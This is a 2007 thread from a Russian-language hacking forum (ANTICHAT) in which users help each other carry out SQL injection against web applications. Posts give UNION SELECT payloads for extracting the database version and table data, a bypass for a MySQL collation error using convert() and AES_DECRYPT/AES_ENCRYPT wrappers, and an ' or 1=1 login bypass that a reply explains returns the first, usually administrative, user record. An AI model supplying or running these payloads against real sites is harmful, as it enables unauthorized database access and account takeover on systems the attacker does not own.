ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
28.08.2007, 11:24
|
|
Постоянный
Регистрация: 07.02.2006
Сообщений: 630
Провел на форуме:
12985021
Репутация:
676
|
|
Termin@L
4nob1oz
Почитайте, наверно много нового узнаете...
http://www.securitylab.ru/contest/212101.php
|
|
|
28.08.2007, 11:52
|
|
Познающий
Регистрация: 09.07.2007
Сообщений: 42
Провел на форуме:
88752
Репутация:
72
|
|
Да знаю я что это blind  Просто я ниразу с мускулем третим не работал и все пишут уже с union, а в третем просто нету его. Вообще жесть blind sql inj на mysql 3.x кошмар просто
To PSIH: Спасибо за линк чтото на подобие этого я и искал. |
|
|
|
29.08.2007, 13:07
|
|
Постоянный
Регистрация: 11.03.2007
Сообщений: 581
Провел на форуме:
4172659
Репутация:
646
|
|
MySQL Error: 1267 (Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_bin,IMPLICIT) for operation 'UNION')
Как обойти?
Добавлено:
При запросе ...?id=-1+union+select+1,2,3
вывод есть, а при
При запросе ...?id=-1+union+select+1,version(),3
выводится хрень выше
Последний раз редактировалось Joker-jar; 29.08.2007 в 13:12..
|
|
|
|
29.08.2007, 13:14
|
|
Участник форума
Регистрация: 07.08.2007
Сообщений: 139
Провел на форуме:
2063900
Репутация:
138
|
|
Сообщение от Joker-jar
Как обойти?
Добавлено:
При запросе ...?id=-1+union+select+1,2,3
вывод есть, а при
При запросе ...?id=-1+union+select+1,version(),3
выводится хрень выше
Используй convert()
|
|
|
|
29.08.2007, 13:15
|
|
Постоянный
Регистрация: 11.03.2007
Сообщений: 581
Провел на форуме:
4172659
Репутация:
646
|
|
convert(version()+using+???) ?
Последний раз редактировалось Joker-jar; 29.08.2007 в 13:16..
Причина: скобки добавил
|
|
|
|
29.08.2007, 13:17
|
|
Участник форума
Регистрация: 07.08.2007
Сообщений: 139
Провел на форуме:
2063900
Репутация:
138
|
|
version() using latin1 - попробуй так
|
|
|
|
29.08.2007, 13:25
|
|
Members of Antichat - Level 5
Регистрация: 24.11.2006
Сообщений: 927
Провел на форуме:
7192869
Репутация:
3033
|
|
union+select+1,2,AES_DECRYPT(AES_ENCRYPT(version() , 0x71),0x71)
__________________
Дети индиго - это бездари, не надо песен! В пять лет едва говорить начинают, мы в этом возрасте стихи наизусть читали!
з.ы http://www.youtube.com/watch?v=sNsQe0KByRY Я ПлакалЪ
|
|
|
|
30.08.2007, 23:05
|
|
Новичок
Регистрация: 30.06.2007
Сообщений: 5
Провел на форуме:
59917
Репутация:
2
|
|
Здравствуйте я полохо знаю sql так что заранее спасибо.
У меня такой вопрос если в поле аутентификации я ввожу например 99 и ' и сервер мне выдает
E_DB_QUERY
SELECT * FROM `sunz_users` WHERE `login` = '99'' LIMIT 1;
Могу я что нить отсюда выудить
|
|
|
|
30.08.2007, 23:21
|
|
Постоянный
Регистрация: 20.01.2007
Сообщений: 787
Провел на форуме:
2924346
Репутация:
1719
|
|
запрос вида
?login=-1'+union+select+someshit+from+sometable/*
поможет)
имена таблиц и столбцов надо подбирать.
|
|
|
|
31.08.2007, 00:12
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734
Репутация:
1917
|
|
Сообщение от n1†R0x
запрос вида
?login=-1'+union+select+someshit+from+sometable/*
поможет)
имена таблиц и столбцов надо подбирать.
а зачем?
просто ввести в поле
и все...
запрос который выполнится будет
Код:
SELECT * FROM `sunz_users` WHERE `login` = '1' or 1=1 limit 1;
другими словами выбрать все данные из таблицы `sunz_users` там где поле login = 1 или если 1=1, а т.к. 1 всегда равно 1 то благодаря limit 1 запрос выбирает из таблицы первые записи (обычно админские) кстати limit 1 необязательно
__________________
Карфаген должен быть разрушен...
Последний раз редактировалось Scipio; 31.08.2007 в 00:24..
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
